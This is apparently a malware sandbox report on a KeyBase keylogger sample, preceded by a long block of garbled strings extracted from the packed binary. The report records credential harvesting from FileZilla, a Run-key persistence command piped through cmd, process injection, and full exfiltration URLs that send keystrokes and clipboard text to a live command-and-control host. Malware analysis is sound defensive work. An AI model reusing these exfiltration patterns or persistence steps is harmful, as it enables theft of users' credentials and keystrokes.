wN&+
|<8?
Q ef
e"W$G
String
68$=_eTpX
_CorExeMain
Wv!to/,
#+h{
#7(}s
,YRK*_x
)@r1
"msa4&;QCh
` wa
i5sl2
CBH<
LQHFOOPpEgA3Hf
7>!`
PropertyInfo
@@dd
1K1y
3+p,
` &C
o5#9
,!Ik
\'[\p#
'9O
Y$XY
QcBi
\tSLS tW
/s>a
`k%c
:0)p
+V!;
1UzK
@}Z8
X2{^f
dY4E
7Plnc
Rdp*Je
9!>"
Upc
Mc1hfdh
'3LS
cf6Y
|$nF
TG=4#
sN)`
1M3
E <)
mQ9S::
ky<x
,R*W
:t,N
]Hls
8%qt
>Fc2
4}pI
,+a6
C;.%
gWou9(
O^Nrw
*my;
EFCiBCA\222J
UV/0
e M(
)Sl~N
uQM`
!TEv
v sN[
c!.2
#"WM_
ErUF
cPL>
Wh8?_
DA~l
,so<
V,iwN
"?af!
{nrt
Ghc(
r0lIN
!9>=
Hxb{
=F~"()
gVt(
Ri,;W8&
iS;r
K@I
+{5I
s Rl
.qjfe
n@G9|o
>NJ_
Y9 O
[C*L
Vy!)
MNGr4gzzul9bskZQqaR
dU$PR
/k*_b
(? cC
aYe#'q|1
IcLA
\F_qw
jjQ^
W/Nd
0_
pk+8
v8T>
lK$` C
_\ 0gA
t(t9Kc
*UL#
5-ZMr?j
y:_E
3T]0
=qT ,
C]Y
N<NNNJNYN
g 8~
E1.k
<D.C
u{zP
-dTn
D5%
/(\:Yw
fre}6
fr9P^
Q 42
R{QOm
VIjU
N4SeL
9[y2k
Kq:,
[XrG
nA>*[
`}F38
LHl=
u6r2k
n)W$08
FXdk
X37T
J]r.8o
"M"l
QjCsYb0
Vr_Ew
9o`O
[_mSE
&M60
/J=@{
b2 Ry
Iwayar
1fnv
#F[
ug-.
D;ue\
MJ2x/:|
#'.
Object
:TZ5
u^%S^1;
F&]SR
wmxQ
w_4>
1FQ2
jimB
`Cc&
6^wV ^@
VVVz
*I5W{
JCfD
}@`_
-8D,]go
R$E
"21{
0KHk)h
F`s1
g4(
O$8LJ
\S@& :
_EZ`d
CegI
e:@Ls
m!C1
FHrW
%Vo
vF?T
|fCq
jfGG
O~DHI
cxFof
1$h{i
9:'v"
X+)~
P8xNt
E$b-
E@:o
z'rx
a7,~
Un<irw
Q %9~
NbNVNYN!N}NqNHNuNgN2N_NXN,N:NLNLN}N%NRN2NfNpN9NJN8NnNeN
Mg&~
;xm4
{X2g2
:2|+(
8H<H
kk$P
NNGNCN
YUtJY
e8u
UTa|{+
gq!b
N5NpNFN
ps\
V=pG
e~]'
'CV3
E\Z@
VQws
NbN*N
*B@k|Jl<
^'u8
>3)n
VjLe
<LGv
Fvq0p
@T1!
!?x
ob6>
15Vd
P7xM
kvY=
[|CZ
Q.IJ
bJ/S
3
`:[@a
||:8
\n)k
tm#
=| f
V2 q
&7Z\
IR %
AiSm
wcQ0
\i_L
S ?E
I,`=
>xnU
4f8~
v%N.
}G0QHW
`pQ&
|1;a1
du}#
^7h
1-Cc
ztZ7
?@=J
1s&G
~Juq
Q-O[
| yWMi}eGt
P 3!
!1C5
oQ:A
/y.8>
xKp}
p9{7
m?x@
F8NKNMN\N
qfNsjKa
oAme
;hmV#
isZ.j
^l-91
3HG.
yYgxaZqNGIoOyV40MvI
zr7&
?b&&
qBO#
<\,/)
qc@'[
&$"^
a2!S
W{>m
G@ZW
ktUi
<^:y
048
<?,U
altzl
O;s
fMkJH
NNN:N/N*N
B>y8Z{>
\NMfUC,
$Vg.
p}oKTp
?-#S
$m$o
P{&vJ
1;?
@O*9
Y"&<%X
N NbN
Jj[1#
j,@'=
4gt4
O y
d,4Z
fi$m
x |;
rdm^O
O2pt
wF&e
System.Threading
C<#TH.
V#ixV
/h;Zd
&"rr
(ci"
U\{j
hL[)
Q[X{
(^"`x?
c5C#
s'94o 3
K5;c
#@`2
{Q7*
2t:9
h:De
=^L
aI1X
9YB
d|iQ}
PyW!t
efJTK
IPh O
0+GR@TyTu
01~S
i(q>6
NNNeN
2@BG
; cyl
ti=t
*[3GlS
H&U@
5h+c
iaahoSc
p\%lZ
vNpK
;]s4
j=<w_k
aTO
) E]
-lx
AV~ub"
*\kH
-dYx
7U@F
4::rH
>Z|b<(
gd=W
Ixiu
%R#Z
:%X?rm
4}eU
q-!,nH
=\.N
_lzv
8}q@5
{!x4d5k
T5XU
jdVU
l>B`s
Sh>iM(
%5"
1w 5
HzPF
&=:*)
ixkK$
>tX
=*UY2
?3')@
E8k\
m2!b>
i1{\
0.<n
p Oc
D) M
)jkwF
n=".
q.=Ra
,$?2
uL7i
Ew"R
`.rsrc
><C;
&{g GZ:g
_n^C
M-hu
z1 %
qAKO
&'r2
Kz.
yY*hJ
f_Ci
v?UGEoV
Sl+I=
qBw`
t^R
e"u R
Pn]h
(s =
~)Wr
ZR$
_ui
uu2IO5G1IpMeuWoSE
; Js
nwnSOLKJH>8
G1Pz
]JC6
F9 "
YRI;
MOD
aW]#
$2CCAp,
|d;;
@uQO
`E]dqP
]H|t4 gj
s}08
@2K|
JQNNQTchmnmjfY.
:=!^
^4bI
0j>y&
v2.0.50727
ATz&(
&K5c
wjLf
LDw
;t*lTn
(Yh&R
:P +
=%$
y>A*
U)KJ
pIU
zn84
s?Il
x_u)
L v.m
<<4"
hqYf
~.Kp\
~6`"
5t@l
Z`#S
Y.$
G[oy
)x-a
o6LH
"T{A
%# V'P
NtNVNiNDN
<3]f_a
5vd
qg+q
H=}
u y{
z8Sd
gd2ZGv
oY)m
kS!x
4<5
d~ & E
_})$
E '
hn+Y
tf6p
Tfi[
yF::I
S.u|i
4&}5T
o[ DQ
nMQu
S3a:
s i
(w )
chlY
jRc w
T]1!
6;;m%
A0L`
oF_b
}Y:I
[9k"
P;X
O?QF@
BM~]yC
dr,
D$bp"
'UID
{z>Y*
@[>,%
dsW
p#Y2
h/b6
GS#F2^,
c_WQ
+ +av
G}jpX
9Iri
A .4>;B
P"84
\ b:
8byn
b-]P
*!hLMy
MS,2
b4W6
6 mh
+hc
|;W`
Qx/C
pP!{2F
vFp!
MPw F
m#bZ
kfC'u}
GeYf
T%1MN
y0Rkw
c}=:U
q2vG
j= p
r0$8
w+G=T
QSY/
fdNE!
r^r0
"JQ0
]ua:
?R_
6b S+
H`9`
GP 0
/8:m
lj"a
nz"[<
B]1L
Jsr{
(9J:
V#r
\.lj
d5:~
IyZw
NhN!NaNKN
xf0d
htPE
) >t
scP
e/~
f0j;
6<?Z^
arYL
y.P6s
*]yB+
WpbJ
A=o&=|{
>!>u
^qpQ}
00M;_'
oG7I
._V4
System.Runtime.CompilerServices
18N':>
cZuGT
-K`
nGh5
qX ]
)+U>
E0{#f[i
O8:l
yT&x
,
n3;G
^~S[O
?O]>d
q~ b
d`B
$I~4
.V2 0
Yv :
YM:/J
Rt fH
N+*3
ud}o
,$uj
OJxp
@`.z
O\$N}\
^%q9
C`i)
\0I4+6
Microsoft.VisualBasic
k`&+
u?h
G&Gq
74m F
zK0&
(_X:
TSHv
E)F&
)x[M
DI9N@
6n_0
r 8,
8<dF
2{Vx
p"Zp
?&i}
]R7(x|
b=\,n0`>
St^a
f$}B&h&
!!!k
cs9sdeZvNlYJoziXc
}kWQ
PcP`
[Z !
2J5A
NeNxNkN}NtN&N<N(N NvNaNfN
LJv/
! "h
l{o]
GcDH
t7X1
$Ff4
NLN}NBN
y\c<$2"W
*`&[
V/K%
bUcrX
uR78
3T,5
5ZE" "
Do;+
=*?&
RYWW|<
;(:7
N6NnN2N
a)kObS
u*C
yWGp
|QygZ
^n[R*+s
D{G]L
&a+K
N;N(N_N~NWNRNoNoN:NHN
Q2<Y
1&XR
fXx`
NbUuv
CiT>KI
Sap'
21}mN9
3#qI
s,:tF
$AH<
_ 't
jeAi
i'Gc
Mc\k
99:p
_=qb@|
543z
LM O
,L U
QMZ
9=2`
Nr_y
=g8jF
R1q(
;5i7L
0'A.N
SI[
|+ d
_HUj
*5j4
***S
\! U
EaAq#
Cq2y9
[=@
Ag<)
92s.V[#
?# ^
K.T3cz
v,
rM\"`
7]P+
.%M_t
Q>??
QOl{
q9+
g_)cJ
A]*T
h.)@
4pU>
sch]
:{\1C
X2eu
c,e `f
s>qUW
>x3dh
wa9F
M9<i
*aq!
7YMzR
PSA18
1l%z;
G\*>
*0r!
Ryu1
lLzP
3AQBM
Ci 8
NsN(N
\II\gnruwwtD)
\_?[
&aQ{
aZt
U|2e
o_6V
=tg
*U/)
9Wz 'e
ob'e2\!Swhy
6X_O
[lIH
>;3N
SQ(/
aoVO
j u_
Qk5W
kzDG
Ql29
zB4+G
`RT\
LC@-
/[fH^
93K]E
'ej4 Q
((&E
Anvnw
Thread
=ABb
9/+:
((&T
Sz#,
O&P
4<s!
fQO9E
zNqB4
g7jn
r9`d
/} `i
s }f
v'{yE
pO>]
`t)
gI3#
hyNP
J>_M
-\@5
|UJ
&TL?2
a<~T
l-oB
f0G|
sb}&?
bZ012
m2'n
0"_A;\
8m8f
@=J:
H=p}/
#,[3
#+?b
N+;#
R}6F]
\7Ss
.D_
Z,6V
y aJ
o4q~
[h-c
cdNNNORTYZYDC=
-
4Ee6
+5UUIU
H4j5
lpUU
D I*
o+8g/
LUtoO
YxIX
k4*]
:_$70RL
gj@!+
y)%}
o2uN
39&5
Bihe
E:&x
cq3y
U^P
&' |
,\[; C
#,8D
o Sp
Dz&o
F{j+&
\ca&
)7d4
>tif9
fx~CX
KH.E
@r~r,
e]a\
%Zpv
kRIQ
=@ps
KZkl(
R3Bi
[a D\{.
K#,h
mscoree.dll
#,I7
,xi1
0-4?|
Z5=D
K=)F0
& i_
9:6a---I
5NK[
:VEK
>'t^
> 9$
k) d
BnBzp
|Ax:Q
opU}
rs:cn
}1S^m$Y
rnA3
h9'e
X'6z
d\#L
([z
Gcw8
5PJP_H
f/^$V{
3% S
VmA3.
#]u\
{Q9j
}KS
<!?.
V q_
uEU9
6#[!
?_c8N
O9a<
,({I
u_|a63L
-OxP
at^k
/WQa
@_$D3
O(3
?92leN
MUgW
};`J
9PM5
.cctor
4<BHCCi*
L%NAN N?NZN
-UM<
yECP
CxY
yc@X
G)ru}
\%KZ
40
VG|#6
)
PS!<
?+J}
bfl"
N{NNNoN=N/NN
[N G
h-t
Q(H~
.SmE
$N3J6
5+H.23
q=P6
^a.'
dB!:
{c9PiW
pa8]W
!!!i
lf(&
kejZ.m
<*
LateSet
*dE+
6PG"
g_(V.
N;N&N{N)N,NrN
d0,o
NR3N
j[Uw
@e!3
v: `/
#],0
DX)>s0
Lv{q
xX30C/
Sleep
%1X
(+ 6
VZmA
0Z=gX
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven02_64 | Seven02_64 | VirtualBox | 2018-02-22 00:02:30 | 2018-02-22 00:05:21 | 171 |
14 Behaviors detected by system signatures
Created network traffic indicative of malicious activity
Severity: High
Confidence: High
- signature: ET TROJAN KeyBase Keylogger HTTP Pattern
- signature: ET TROJAN KeyBase Keylogger Uploading Screenshots
- signature: Traffico Anomalo: Traffico verso host malevolo, GET HTTP Content ".php" (Soc-Rule)
Harvests information related to installed instant messenger clients
Severity: High
Confidence: Very High
- key: HKEY_CURRENT_USER\Software\IMVU\username
- key: HKEY_CURRENT_USER\Software\Paltalk
Harvests credentials from local FTP client softwares
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml
Creates a copy of itself
Severity: High
Confidence: Very High
- copy: C:\Users\Seven01\Desktop\PSAA1.exe
Installs itself for autorun at Windows startup
Severity: High
Confidence: Very High
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PSA
- data: cmd /c type C:\Users\Seven01\AppData\Local\Temp\PSA.txt | cmd
A process attempted to delay the analysis task by a long amount of time.
Severity: High
Confidence: Very High
- Process: PSAA1.exe tried to sleep 45019 seconds, actually delayed analysis time by 0 seconds
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: PSAA1.exe(2620) -> PSAA1.exe(2900)
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 7.99, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00034000, virtual_size: 0x00033fc4
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://settings.platinumistabul.com/keybase/post.php?type=clipboard&machinename=SEVEN02-PC&windowtitle=&clipboardtext=nepituorarcesrnreidmshaspnhdmilfriesets%20twreiaar%20togyddohacgotmcotu%20moebofyaohpp%20olr%20tieasdho%20ptletbsoi%20oegdcelfgdocslhseooarai%20fteh%20pi%20ddsh%20ldreim%20oeb%20eo%20trheotyeal%20etuhrihdl%20%20hishewimsdlefd%20utpaneeeiaildeihdih%20%20hien%20ninagrerearoondpdaeepc%20aheomhmgeoacu%20tahnoe%20uhooetpnsruelitiowle%20eehiehlhreiweeeecatetidreealilwiii%20tdoagbstehnrtogoe%20oeanhoclntihhourre%20gimo%20mot%20ogrlawlachbtrahfo%20%20seytcedsdpstta%20rllrn%20c%20olitgu%20hyaiowmnewnelhstwdmliliu%20wdngoityhghuoohrisfi%20pebdroddnnhnahahns%20ytalbhrabalddtngautoaibndntudeldh%20gthdaon%20eoeosusraaeawdg%20dmoyathmt%20%20aehdr%20gresetie%20a&machinetime=3.04
- url: http://settings.platinumistabul.com/keybase/image/upload.php
- url: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=4.22
- url: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=4.43
- url: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=5.43
- url: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Start&keystrokestyped=&machinetime=7.23
- url: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=7.23
- url: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=9.04
- url: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=9.04
- url: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=17.33
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- post_no_referer: HTTP traffic contains a POST request with no referer header
- post_no_useragent: HTTP traffic contains a POST request with no user-agent header
- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=clipboard&machinename=SEVEN02-PC&windowtitle=&clipboardtext=nepituorarcesrnreidmshaspnhdmilfriesets%20twreiaar%20togyddohacgotmcotu%20moebofyaohpp%20olr%20tieasdho%20ptletbsoi%20oegdcelfgdocslhseooarai%20fteh%20pi%20ddsh%20ldreim%20oeb%20eo%20trheotyeal%20etuhrihdl%20%20hishewimsdlefd%20utpaneeeiaildeihdih%20%20hien%20ninagrerearoondpdaeepc%20aheomhmgeoacu%20tahnoe%20uhooetpnsruelitiowle%20eehiehlhreiweeeecatetidreealilwiii%20tdoagbstehnrtogoe%20oeanhoclntihhourre%20gimo%20mot%20ogrlawlachbtrahfo%20%20seytcedsdpstta%20rllrn%20c%20olitgu%20hyaiowmnewnelhstwdmliliu%20wdngoityhghuoohrisfi%20pebdroddnnhnahahns%20ytalbhrabalddtngautoaibndntudeldh%20gthdaon%20eoeosusraaeawdg%20dmoyathmt%20%20aehdr%20gresetie%20a&machinetime=3.04
- suspicious_request: http://settings.platinumistabul.com/keybase/image/upload.php
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=4.22
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=4.43
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=5.43
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Start&keystrokestyped=&machinetime=7.23
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=7.23
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=9.04
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=9.04
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=17.33
Drops a binary and executes it
Severity: Medium
Confidence: Medium
- binary: C:\Users\Seven01\Desktop\PSAA1.exe
A process created a hidden window
Severity: Medium
Confidence: Very High
- Process: PSA18.exe -> "cmd"
- Process: PSAA1.exe -> "cmd"
Creates RWX memory
Severity: Medium
Confidence: Medium
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven02_64 | Seven02_64 | VirtualBox | 2018-02-22 00:02:30 | 2018-02-22 00:05:21 | 171 |
10 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\PSA18.exe.config C:\Users\Seven01\AppData\Local\Temp\PSA18.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Users\Seven01\AppData\Local\Temp\PSA18.exe.Local\ C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows C:\Windows\winsxs C:\Windows\Microsoft.NET\Framework\v4.0.30319 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\System32\l_intl.nls C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll \Device\KsecDD C:\Users\Seven01\AppData\Local\Temp\PSA18.INI C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol21.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI C:\Windows\Globalization\it-it.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Users\Seven01\AppData\Local\Temp\it-IT\PSA18.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\PSA18.resources\PSA18.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\PSA18.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\PSA18.resources\PSA18.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\Globalization\it.nlp C:\Users\Seven01\AppData\Local\Temp\it\PSA18.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\PSA18.resources\PSA18.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\PSA18.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\PSA18.resources\PSA18.resources.exe C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.INI C:\Windows\Globalization\en-us.nlp C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ntdll.dll C:\Users\Seven01\Desktop C:\Users\Seven01\Desktop\PSAA1.exe \Device\NamedPipe\ C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2288.10840953 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2288.10840953 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2288.10840984 C:\Windows\System32\Branding\Basebrd\Basebrd.dll C:\Windows\Branding\Basebrd\basebrd.dll C:\Windows\Globalization\Sorting\sortdefault.nls C:\Users\Seven01\AppData\Local\Temp\"C:\Users\Seven01\Desktop\PSAA1.exe" C:\Users\Seven01\Desktop\PSAA1.exe.config C:\Users\Seven01\Desktop\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Users\Seven01\Desktop\PSAA1.exe.Local\ C:\Users\Seven01\Desktop\PSAA1.INI C:\Users\Seven01\Desktop\it-IT\PSA18.resources.dll C:\Users\Seven01\Desktop\it-IT\PSA18.resources\PSA18.resources.dll C:\Users\Seven01\Desktop\it-IT\PSA18.resources.exe C:\Users\Seven01\Desktop\it-IT\PSA18.resources\PSA18.resources.exe C:\Users\Seven01\Desktop\it\PSA18.resources.dll C:\Users\Seven01\Desktop\it\PSA18.resources\PSA18.resources.dll C:\Users\Seven01\Desktop\it\PSA18.resources.exe C:\Users\Seven01\Desktop\it\PSA18.resources\PSA18.resources.exe C:\Users\Seven01\Desktop\it-IT\mscorlib.resources.dll C:\Users\Seven01\Desktop\it-IT\mscorlib.resources\mscorlib.resources.dll C:\Users\Seven01\Desktop\it-IT\mscorlib.resources.exe C:\Users\Seven01\Desktop\it-IT\mscorlib.resources\mscorlib.resources.exe C:\Users\Seven01\Desktop\RunPEDll.dll C:\Users\Seven01\Desktop\RunPEDll\RunPEDll.dll C:\Users\Seven01\Desktop\RunPEDll.exe C:\Users\Seven01\Desktop\RunPEDll\RunPEDll.exe C:\Users\Seven01\Desktop\it-IT\stub.resources.dll C:\Users\Seven01\Desktop\it-IT\stub.resources\stub.resources.dll C:\Users\Seven01\Desktop\it-IT\stub.resources.exe C:\Users\Seven01\Desktop\it-IT\stub.resources\stub.resources.exe C:\Users\Seven01\Desktop\it\stub.resources.dll C:\Users\Seven01\Desktop\it\stub.resources\stub.resources.dll C:\Users\Seven01\Desktop\it\stub.resources.exe C:\Users\Seven01\Desktop\it\stub.resources\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\PSA.txt C:\Users\Seven01\Desktop\it-IT\k843834je.resources.dll C:\Users\Seven01\Desktop\it-IT\k843834je.resources\k843834je.resources.dll C:\Users\Seven01\Desktop\it-IT\k843834je.resources.exe C:\Users\Seven01\Desktop\it-IT\k843834je.resources\k843834je.resources.exe C:\Users\Seven01\Desktop\it\k843834je.resources.dll C:\Users\Seven01\Desktop\it\k843834je.resources\k843834je.resources.dll C:\Users\Seven01\Desktop\it\k843834je.resources.exe C:\Users\Seven01\Desktop\it\k843834je.resources\k843834je.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2620.10842828 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2620.10842828 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2620.10842828 C:\Users\Seven01\AppData\Local\Temp\reg.* C:\Users\Seven01\AppData\Local\Temp\reg C:\ProgramData\Oracle\Java\javapath\reg.* C:\ProgramData\Oracle\Java\javapath\reg C:\Windows\System32\reg.* C:\Windows\System32\reg.COM C:\Windows\System32\reg.exe C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\ProgramData\Mails.txt C:\ProgramData\Browsers.txt C:\Windows\System32\tzres.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\Gdiplus.dll C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80 C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll 